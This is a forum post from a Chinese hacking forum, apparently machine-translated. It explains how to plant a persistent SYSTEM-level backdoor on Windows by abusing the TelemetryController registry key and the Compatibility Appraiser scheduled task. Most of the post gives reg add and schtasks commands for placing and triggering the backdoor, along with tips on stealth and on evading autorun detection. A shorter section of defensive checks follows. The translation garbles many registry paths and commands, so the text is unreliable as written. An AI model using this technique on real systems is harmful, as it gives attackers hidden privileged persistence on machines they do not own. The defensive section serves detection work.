跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

基于远程控制器的后门分析


KaiWn

推荐的帖子

0x00 前言

我从滥用Windows遥测技术实现持久性中学到了一种由TelemetryController实现的自启动后门方法。在Win10下测试没有问题,但是在Win7和Server2012R2下测试遇到了不同的结果。

本文将记录我的学习经历,分析使用方法,并给出答辩建议。

参考资料:

https://www . trusted sec . com/blog/abiling-windows-telemetry-for-persistence/

0x01 简介

本文将介绍以下内容:

基础知识

常规利用方法

Win7和Server2012R2中的问题

解决办法

使用方法

辩护建议

0x02 基础知识

1.TelemetryController

相应的过程是CompatTelRunner.exe。

CompatTelRunner.exe称之为Windows兼容遥测监控程序。它定期向微软发送使用和性能数据,以改善用户体验并修复潜在的错误。

通常是用来升级win10进行兼容性检查的程序。

由计划任务Microsoft兼容性鉴定员启动

默认情况下,计划任务Microsoft兼容性鉴定器处于启用状态,每隔一天自动运行,任何用户登录时也会运行。

2.计划任务Microsoft Compatibility Appraiser

(1)通过面板查看计划任务

启动taskschd.msc

选择任务计划程序(本地)-任务计划程序库-Microsoft-windows-应用程序体验,然后选择Microsoft兼容性评估器。

如下图

2-1.png

在这里您可以看到计划任务Microsoft兼容性鉴定人的详细信息。

(2)通过命令行查看计划任务

该命令如下所示:

schtasks/查询

如果是在中文操作系统中,可能会出现以下错误:

错误:无法加载列资源。

如下图

2-2.png

检查cmd代码并执行命令:chcp

返回结果:

活动代码页:936

使用936中国GBK代码。

如下图

2-3.png

解决方法:

改为437美国代码,命令如下:chcp 437

再次执行:schtasks /query

结果很正常。

如下图

2-4.png

直接筛选出Microsoft compatibility assessor:

schtasks/query/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

显示详细信息:

schtasks/query/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft兼容性鉴定人'/v

修改计划任务的状态,并将禁用状态更改为启用:

schtasks/Change/ENABLE/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

0x03 常规利用方法

1.修改注册表

修改注册表HKEY _本地_机器\软件\微软\ Windows NT \当前版本\ appcompatflags \遥测控制器

用任何名称创建一个新密钥。关键信息如下:

命令REG _ SZ C:\ Windows \ system32 \ notepad . exe

每夜REG_DWORD1

上述操作可以通过命令行实现,命令如下:

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ fun '/v Nightly/t REG _ DWORD/d 1

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ fun '/v Command/t REG _ SZ/d ' C:\ Windows \ system32 \ notepad . exe '/f

注:

这里创建了一个名为fun的键。

2.开启计划任务Microsoft Compatibility Appraiser

您可以选择等待计划任务开始。

也可以强制打开,命令如下:

schtasks/run/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

在后门的触发下,Win10系统下的系统权限将立即启动CompatTelRunner.exe和notepad.exe进程。

注:

作为CompatTelRunner.exe的父进程,如果notepad.exe进程正在运行,那么CompatTelRunner.exe进程已被阻塞。

0x04 在Win7和Server2012R2下遇到的问题

方法同上。后门启动后,两个进程的CompatTelRunner.exe将以系统权限启动。

如下图

2-5.png

一个CompatTelRunner.exe的命令行参数是:

c:\ Windows \ system32 \ compatt elrunner . exe-m:apparent . dll-f:DoScheduledTelemetryRun-cv:4 in qvax 40k hdrm 9.1

该进程对应于注册表HKEY _本地_机器\软件\微软\ Windows NT \当前版本\ appcompatflags \遥测控制器\评估器。

经过实际测试,得出以下结论:

一段时间后,如果检查仍未完成,流程CompatTelRunner.exe将继续运行,而流程notepad.exe无法使用系统权限启动。

经过一段时间后,如果完成检查,进程CompatTelRunner.exe会自动退出,接下来以系统权限启动进程CompatTelRunner.exe和notepad.exe

如果选择强制结束进程CompatTelRunner.exe,同样接下来会以系统权限启动进程CompatTelRunner.exe和notepad.exe

如下图

2-6.png

这里我们可以避免这个问题,实现稳定触发,以系统权限启动进程CompatTelRunner.exe和notepad.exe,方法如下:

修改注册表HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ evaluator的命令项

默认值为% windir % \ system32 \ compatt El runner。exe-m:明显。dll-f:DoScheduledTelemetryRun

这里可以选择跳过检查过程,例如将命令项的值置空,就不会在计划任务启动时执行检查

为了提高隐蔽性,可以将命令项设置为% windir % \ system32 \ compatt El runner。exe-m:明显。动态链接库

为了验证修改键值是否影响系统的正常功能,可以对% windir % \ system32 \ compatt El runner。可执行程序的扩展名进行反编译

启动进程的伪代码细节如下图

3-1.png

0x05 利用方法

1.前置条件

需要查看是否开启默认的计划任务微软兼容性评估师,查询命令如下:

schtasks/query/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft兼容性鉴定人/v

2.放置后门

我在Win7、Server2012R2、Win10测试的结果表明,稳定利用方法如下:

修改注册表HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ evaluator的命令项

值设置为c:\ WINDOWS \ system32 \ cmd。exe/c notepad.exe

命令行实现的命令如下:

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ evaluator '/v Command/t REG _ EXPAND _ SZ/d ' C:\ Windows \ system32 \ cmd。exe/C记事本。exe '/f

补充:还原配置的命令

REG add ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ evaluator '/v Command/t REG _ EXPAND _ SZ/d ' % windir % \ system32 \ compatt elrunner。exe-m:评估者。dll-f:DoScheduledTelemetryRun '/f

3.后门触发

等待计划任务微软兼容性鉴定人运行

为了便于测试,可以强制开启,命令如下:

schtasks/run/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

4.特点

能够绕过自动运行的检测,以系统权限执行命令

断网状态下同样能够触发

0x06 防御建议

1.查看注册表的默认值是否被修改

(1)查看注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Appraiser的Command项

命令如下:

reg query ' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ evaluator '/v命令

默认值如下:

命令REG _ EXPAND _ SZ % windir % \ system32 \ compattelrunner。exe-m:明显。dll-f:DoScheduledTelemetryRun

(2)查看注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController下的Key

命令如下:

注册表查询' hklm \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController '

默认值如下:

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ TelemetryController \ evaluator

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ apparetharserver

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ av status

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ Census

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \ telemetry controller \ census server

HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ current version \ AppCompatFlags \遥测控制器\ inv agent

2.禁用计划任务Microsoft Compatibility Appraiser

命令如下:

schtasks/Change/DISABLE/TN ' \ Microsoft \ Windows \ Application Experience \ Microsoft Compatibility assessor '

3.查看进程CompatTelRunner.exe信息

分析进程CompatTelRunner.exe下是否有可疑子进程

0x07 小结

本文记录了我对遥测控制器后门机制的学习心得,总结出了更为通用的利用方法,给出针对性的防御建议。

留下回复

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...